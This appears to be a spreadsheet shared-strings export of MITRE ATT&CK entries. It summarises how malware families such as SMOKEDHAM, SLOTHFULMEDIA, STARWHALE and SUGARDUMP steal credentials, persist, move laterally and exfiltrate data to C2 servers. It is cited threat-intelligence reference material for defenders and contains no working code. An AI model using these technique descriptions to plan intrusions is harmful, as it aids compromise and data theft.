    <t>relationship--fd68dcb1-686c-4e48-9b6c-26c98a4f43e5</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can collect start time information from a compromised host.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--6316bedb-6962-4da1-8714-08b414fa7c73</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can find a process owned by a specific user and impersonate the associated token.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--6b5705c3-4508-4623-b542-1fb1fbef2a47</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use `cmd.exe` to enable lateral movement using DCOM.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--ce4c8a4a-793f-48ba-b194-312e54f378d0</t>
  </si>
  <si>
    <t xml:space="preserve">[SILENTTRINITY](https://attack.mitre.org/software/S0692) can gather Windows Vault credentials.(Citation: GitHub SILENTTRINITY Modules July 2019) </t>
  </si>
  <si>
    <t>relationship--bc0367d2-ad95-4197-b3b4-432e8bba6fec</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can use WMI for lateral movement.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--533a2f2c-6cc9-48fa-b029-17cc827e12d7</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can create a WMI Event to execute a payload for persistence.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--670dc748-f1c8-4ba3-b999-f942fa42ce50</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) tracks `TrustedHosts` and can move laterally to these targets via WinRM.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--db1f0baf-27ee-4e1c-9d8f-6a82918b5f0f</t>
  </si>
  <si>
    <t>[SILENTTRINITY](https://attack.mitre.org/software/S0692) can establish persistence by creating a new service.(Citation: GitHub SILENTTRINITY Modules July 2019)</t>
  </si>
  <si>
    <t>relationship--3efd847d-47ec-4460-ad63-6233b177ee64</t>
  </si>
  <si>
    <t>S0533</t>
  </si>
  <si>
    <t>SLOTHFULMEDIA</t>
  </si>
  <si>
    <t>malware--feb2d7bb-aacb-48df-ad04-ccf41a30cd90</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has hashed a string containing system information prior to exfiltration via POST requests.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--6d182b64-121f-43bf-b268-fe1e5874087d</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has uploaded files and information from victim machines.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--644d8961-2e4e-4aa1-b7d8-6759a64b25e8</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has sent system information to a C2 server via HTTP and HTTPS POST requests.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--0c6329d8-4f00-4b3b-aa82-3bc2e9f14766</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has deleted itself and the 'index.dat' file on a compromised machine to remove recent Internet history from the system.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--99e04ca5-f096-4069-888d-12e8945a69ce</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can enumerate files and directories.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--70fa48cc-4acf-4df3-b8a0-d862b2b67f33</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has been created with a hidden attribute to insure it's not visible to the victim.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--f71229d4-5499-4eb1-ad83-b18a1063b5b7</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has downloaded files onto a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--99f5f421-c462-472c-9aa8-29a4316c3f5e</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has a keylogging capability.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--39b38f3b-e878-4bce-967b-59035a528595</t>
  </si>
  <si>
    <t xml:space="preserve">[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has named a service it establishes on victim machines as "TaskFrame" to hide its malicious purpose.(Citation: CISA MAR SLOTHFULMEDIA October 2020) </t>
  </si>
  <si>
    <t>relationship--5c039dbf-c443-4f9b-b036-fcabaed74a3b</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has mimicked the names of known executables, such as mediaplayer.exe.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--0f174d38-f30b-4037-a1bc-ecc099809966</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</si>
  <si>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</si>
  <si>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relationship--10fb2420-a482-4909-90c6-fd9f7e5c24a6</t>
  </si>
  <si>
    <t xml:space="preserve">[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has enumerated processes by ID, name, or privileges.(Citation: CISA MAR SLOTHFULMEDIA October 2020) </t>
  </si>
  <si>
    <t>relationship--cd68ff0c-88c9-4a71-82ff-f16da53ed8ed</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can inject into running processes on a compromised host.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--11f33a6b-f2f5-4c35-a72a-e2197340b425</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has taken a screenshot of a victim's desktop, named it "Filter3.jpg", and stored it in the local directory.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--e7477fbb-361f-4502-99d4-75576d6d3ac7</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to start services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--606d0114-e9a5-49a6-a6b9-0f67da987969</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to stop processes and services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--922cc16d-2242-477b-89db-1ba3d5176e12</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has collected system name, OS version, adapter information, memory usage, and disk information from a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--f8a9e39a-0038-437c-96ad-4408d028dd86</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can enumerate open ports on a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--9d201245-16f4-4142-94ff-25136107d0f6</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has collected the username from a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--4a7a38c4-fb6d-420e-ac37-0c774c7b3a9f</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to enumerate services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--348ac89f-1a85-4ab2-887f-4e58dfc14853</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has used HTTP and HTTPS for C2 communications.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--23d2aa8e-0b95-4714-8b76-b1a0735ffdeb</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can open a command line to execute commands.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--46c4ce23-1285-49e5-92a0-863251af60cd</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has created a service on victim machines named "TaskFrame" to establish persistence.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>relationship--5724994d-7213-4a70-8065-1a12280f8f4c</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) uses cloud based services for C2.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--2b789109-44c7-4195-8df8-50b1e09b1a69</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) downloads additional payloads.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--4c5ae895-9a08-40b6-a548-273a9f96ad5b</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) collects and sends system information to its C2.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>relationship--128eb6e8-d1a7-4ff6-85e6-a68cfea3298e</t>
  </si>
  <si>
    <t>S0649</t>
  </si>
  <si>
    <t>SMOKEDHAM</t>
  </si>
  <si>
    <t>malware--7e0f8b0f-716e-494d-827e-310bd6ed709e</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has added user accounts to local Admin groups.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--34c81138-a5b5-4158-bdb7-18be1c52acc6</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used a fronted domain to obfuscate its hard-coded C2 server domain.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--f1e3ae26-843a-4094-a8df-aef50d983b54</t>
  </si>
  <si>
    <t>The [SMOKEDHAM](https://attack.mitre.org/software/S0649) source code is embedded in the dropper as an encrypted string.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--a4730261-b1b2-45ba-8874-b2edcdd13a75</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has exfiltrated data to its C2 server.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--9e26a79d-1982-46b8-b077-0bb6ca30cd3b</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has modified the Registry to hide created user accounts from the Windows logon screen. (Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--2fd6ac0b-f091-4cd0-a6ad-6b476e980fad</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used Powershell to download UltraVNC and [ngrok](https://attack.mitre.org/software/S0508) from third-party file sharing sites.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--452e340a-df31-4ae9-a801-d26c57d491ea</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) can continuously capture keystrokes.(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--6ea21ff2-85d8-4c2f-a6b9-10a6e32814e5</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used &lt;code&gt;net.exe user&lt;/code&gt; and &lt;code&gt;net.exe users&lt;/code&gt; to enumerate local accounts on a compromised host.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--e91c647e-7076-4290-b7c4-017822fdfd59</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has created user accounts.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--327d7bd3-ab28-4016-8d5e-b4364a413566</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has relied upon users clicking on a malicious link delivered through phishing.(Citation: FireEye Shining A Light on DARKSIDE May 2021)</t>
  </si>
  <si>
    <t>relationship--5969ffbe-edd3-4bb3-aee4-4e73ac9c6a7f</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has modified registry keys for persistence, to enable credential caching for credential access, and to facilitate lateral movement via RDP.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--331f7990-d817-49ec-9d55-c4c64da7f4a6</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) can execute Powershell commands sent from its C2 server.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--d434a3c1-8960-4d47-80fc-e3002c507d94</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used &lt;code&gt;reg.exe&lt;/code&gt; to create a Registry Run key.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--70b1afda-98b8-4c7c-ad41-ceb2b45af5d4</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) can capture screenshots of the victim’s desktop.(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--b8bab261-69f2-49b4-83df-c2f8997753b1</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has been delivered via malicious links in phishing emails.(Citation: FireEye Shining A Light on DARKSIDE May 2021)</t>
  </si>
  <si>
    <t>relationship--93885649-e686-4496-96fc-aa901e626ca5</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has encoded its C2 traffic with Base64.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--30f98441-b9cd-49ab-ba95-c7f19a82becd</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has encrypted its C2 traffic with RC4.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--0335dd7e-1f5e-4068-b680-197de6c0af68</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used the &lt;code&gt;systeminfo&lt;/code&gt; command on a compromised host.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--4ae0fc35-a321-4ffb-b7fa-b03a20230fc4</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used &lt;code&gt;whoami&lt;/code&gt; commands to identify system owners.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--8607f9cc-dd15-49a8-8e6a-55e1338591e9</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has communicated with its C2 servers via HTTPS and HTTP POST requests.(Citation: FireEye SMOKEDHAM June 2021)</t>
  </si>
  <si>
    <t>relationship--6dbd64e1-bc8a-44f9-811c-a1ccd32318d1</t>
  </si>
  <si>
    <t>[SMOKEDHAM](https://attack.mitre.org/software/S0649) has used Google Drive and Dropbox to host files downloaded by victims via malicious links.(Citation: FireEye Shining A Light on DARKSIDE May 2021)</t>
  </si>
  <si>
    <t>relationship--49543c25-bc04-49ba-820e-aa45546c414f</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) establishes persistence through a Registry Run key.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>relationship--c75cc595-79d7-4a77-9647-d2323aad93d0</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) encrypts C2 traffic using AES with a static key.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>relationship--f02f0a58-a76b-4966-8717-8a9b40b07e81</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) communicates with its C2 server over HTTP.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>relationship--2121683c-ab01-4212-b2d2-af290dd8ed17</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) is capable of executing commands and spawning a reverse shell.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>relationship--e27e75c2-5734-4602-8a32-c56bb50f890b</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of enumerating application windows.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--b640dfee-9502-4ffb-92e4-f153f8726383</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) communicates via DNS for C2.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--a403648d-4c23-46bd-9688-1face1407b42</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of enumerating and manipulating files and directories.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--c3ee174d-fd40-4636-97b2-afe80854f987</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of modifying the Registry.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--6592447f-31c8-46d0-8e88-47584fa301f0</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of gathering system information.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>relationship--5c4e0ddb-57a1-440f-82ab-146847c99be8</t>
  </si>
  <si>
    <t>Data [SPACESHIP](https://attack.mitre.org/software/S0035) copies to the staging area is compressed with zlib. Bytes are rotated by four positions and XOR'ed with 0x23.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--23df6015-0167-481c-84aa-3d15d3e38a85</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) copies staged data to removable drives when they are inserted into the system.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--04e2c418-8f6c-453c-8e17-4d3aeec0f755</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) identifies files and directories for collection by searching for specific file extensions or file modification time.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--d0332cfa-d932-4bc3-b661-9cd72c00b390</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) identifies files with certain extensions and copies them to a directory in the user's profile.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--9e214d5b-7d46-4135-bc42-4caab16b39d8</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) achieves persistence by creating a shortcut in the current user's Startup folder.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>relationship--689c51b8-7e41-474e-abf6-ffdde0acc40b</t>
  </si>
  <si>
    <t>relationship--8a48e090-ab8c-414e-b559-7a0437c92850</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has used a character insertion obfuscation technique, making the script appear to contain Chinese characters.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>relationship--b1c27a03-1598-41eb-b2e6-426704d22ba8</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has scripts that are responsible for deobfuscating additional scripts.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>relationship--b7f13afc-0e1c-4142-b05c-def10c17a8d6</t>
  </si>
  <si>
    <t xml:space="preserve">[SQLRat](https://attack.mitre.org/software/S0390) has used been observed deleting scripts once used.(Citation: Flashpoint FIN 7 March 2019)	</t>
  </si>
  <si>
    <t>relationship--0705be49-4ad2-4b50-a024-e8b79b53a1ab</t>
  </si>
  <si>
    <t xml:space="preserve">[SQLRat](https://attack.mitre.org/software/S0390) can make a direct SQL connection to a Microsoft database controlled by the attackers, retrieve an item from the bindata table, then write and execute the file on disk.(Citation: Flashpoint FIN 7 March 2019)	</t>
  </si>
  <si>
    <t>relationship--1cfc5611-b428-4fce-8b8d-f591523c9d9c</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) relies on users clicking on an embedded image to execute the scripts.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>relationship--60b2b967-6481-4842-9904-547a7c626ea6</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has used PowerShell to create a Meterpreter session.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>relationship--f6f5d688-5f78-492f-aed9-12f299b4f6f5</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has created scheduled tasks in &lt;code&gt;%appdata%\Roaming\Microsoft\Templates\&lt;/code&gt;.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>relationship--cd07e694-b95b-4797-b2da-63704b4e8939</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has used SQL to execute JavaScript and VB scripts on the host system.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>relationship--1bab673f-4d0f-473a-8c4d-9b6b53c1369d</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) can collect data from an infected local host.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--eb956f4e-0fa5-4b2e-822a-5e313226edb5</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) can exfiltrate collected data to its C2 servers.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--401c021f-60eb-49ae-8019-561c2785b12f</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has stored collected data in a file called `stari.txt`.(Citation: Mandiant UNC3313 Feb 2022)</t>
  </si>
  <si>
    <t>relationship--f2d62173-bd89-4d00-bcb6-5e4f6fa43df2</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has relied on victims opening a malicious Excel file for execution.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--8cfc4444-a2bd-4553-8a26-9018cb561705</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has been obfuscated with hex-encoded strings.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--be48b079-418b-41c3-952b-cbf8a48f2002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</si>
  <si>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</si>
  <si>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relationship--434296ee-6296-4d0a-a72e-bebb914c9700</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has the ability to hex-encode collected data from an infected host.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--e48c9be7-6a02-4170-a63a-204c6308a825</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) can gather the computer name of an infected host.(Citation: Mandiant UNC3313 Feb 2022)(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--12168524-c6cf-4b8f-b114-7b10b06b8f32</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has the ability to collect the IP address of an infected host.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--b7fefa27-dcd3-4245-b7c0-6ca85bca5047</t>
  </si>
  <si>
    <t xml:space="preserve">[STARWHALE](https://attack.mitre.org/software/S1037) can gather the username from an infected host.(Citation: Mandiant UNC3313 Feb 2022)(Citation: DHS CISA AA22-055A MuddyWater February 2022) </t>
  </si>
  <si>
    <t>relationship--7ed13f1b-fa49-4b4e-9bc8-935012710d5f</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) can use the VBScript function `GetRef` as part of its persistence mechanism.(Citation: Mandiant UNC3313 Feb 2022)</t>
  </si>
  <si>
    <t>relationship--926f0751-679b-474e-acd0-06e485afd9f5</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has the ability to contact actor-controlled C2 servers via HTTP.(Citation: Mandiant UNC3313 Feb 2022)(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>relationship--6528daf3-3e79-4d35-8f75-aea6ea5aed47</t>
  </si>
  <si>
    <t>[STARWHALE](https://attack.mitre.org/software/S1037) has the ability to execute commands via `cmd.exe`.(Citation: Mandiant UNC3313 Feb 2022)</t>
  </si>
  <si>
    <t>relationship--d237fd35-4ad6-4f95-a779-e1d2a4ae2517</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</si>
  <si>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</si>
  <si>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relationship--1b3e8c1d-65d2-47a6-91f4-d8dcc52ca01c</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) has encrypted collected data using AES CBC mode and encoded it using Base64.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--e7c29485-c988-4313-8081-60241abe1178</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) has collected browser bookmark and history information.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--a0020049-7688-4c0a-8844-dece3bed614c</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) variants have harvested credentials from browsers such as Firefox, Chrome, Opera, and Edge.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--1f552cc5-66fe-44a6-8881-8e127fc5c0f0</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) has sent stolen credentials and other data to its C2 server.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--2211dd80-6ab2-4d3b-90fd-3ae19e75b64f</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) can search for and collect data from specific Chrome, Opera, Microsoft Edge, and Firefox files, including any folders that have the string `Profile` in its name.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--12e62986-c406-4767-9cc5-49d05c5c34b7</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) has stored collected data under `%&lt;malware_execution_folder&gt;%\\CrashLog.txt`.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--5b4d7467-8418-42c8-bb6f-ad275fc7fb40</t>
  </si>
  <si>
    <t>A [SUGARDUMP](https://attack.mitre.org/software/S1042) variant used SMTP for C2.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--db937076-3d30-471f-ad39-9565d61b614f</t>
  </si>
  <si>
    <t>Some [SUGARDUMP](https://attack.mitre.org/software/S1042) variants required a user to enable a macro within a malicious .xls file for execution.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--da62e1f0-d49d-40ed-b983-fcfaaacb42f5</t>
  </si>
  <si>
    <t xml:space="preserve">[SUGARDUMP](https://attack.mitre.org/software/S1042)'s scheduled task has been named `MicrosoftInternetExplorerCrashRepoeterTaskMachineUA` or `MicrosoftEdgeCrashRepoeterTaskMachineUA`, depending on the Windows OS version.(Citation: Mandiant UNC3890 Aug 2022) </t>
  </si>
  <si>
    <t>relationship--2913137b-33ce-4488-a274-25fc9198d693</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) has been named `CrashReporter.exe` to appear as a legitimate Mozilla executable.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--59e2e811-8f23-40bc-ae20-040feb1fa1fe</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</si>
  <si>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</si>
  <si>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relationship--89bcfd5b-376a-4191-9b49-553001df844f</t>
  </si>
  <si>
    <t>[SUGARDUMP](https://attack.mitre.org/software/S1042) can identify Chrome, Opera, Edge Chromium, and Firefox browsers, including version number, on a compromised host.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--2f8394e6-2cf2-473a-b60a-6de2e69c39c8</t>
  </si>
  <si>
    <t>A [SUGARDUMP](https://attack.mitre.org/software/S1042) variant has used HTTP for C2.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--d3d7c2a6-33ae-460d-a759-e3f755264d0e</t>
  </si>
  <si>
    <t>[SUGARUSH](https://attack.mitre.org/software/S1049) has checked for internet connectivity from an infected host before attempting to establish a new TCP connection.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--35c568aa-29af-4879-bdee-4f6a1f54ff22</t>
  </si>
  <si>
    <t>[SUGARUSH](https://attack.mitre.org/software/S1049) has used TCP for C2.(Citation: Mandiant UNC3890 Aug 2022)</t>
  </si>
  <si>
    <t>relationship--fee0eb4c-b629-45ea-ae20-d8f037fd658e</t>
  </si>
  <si>
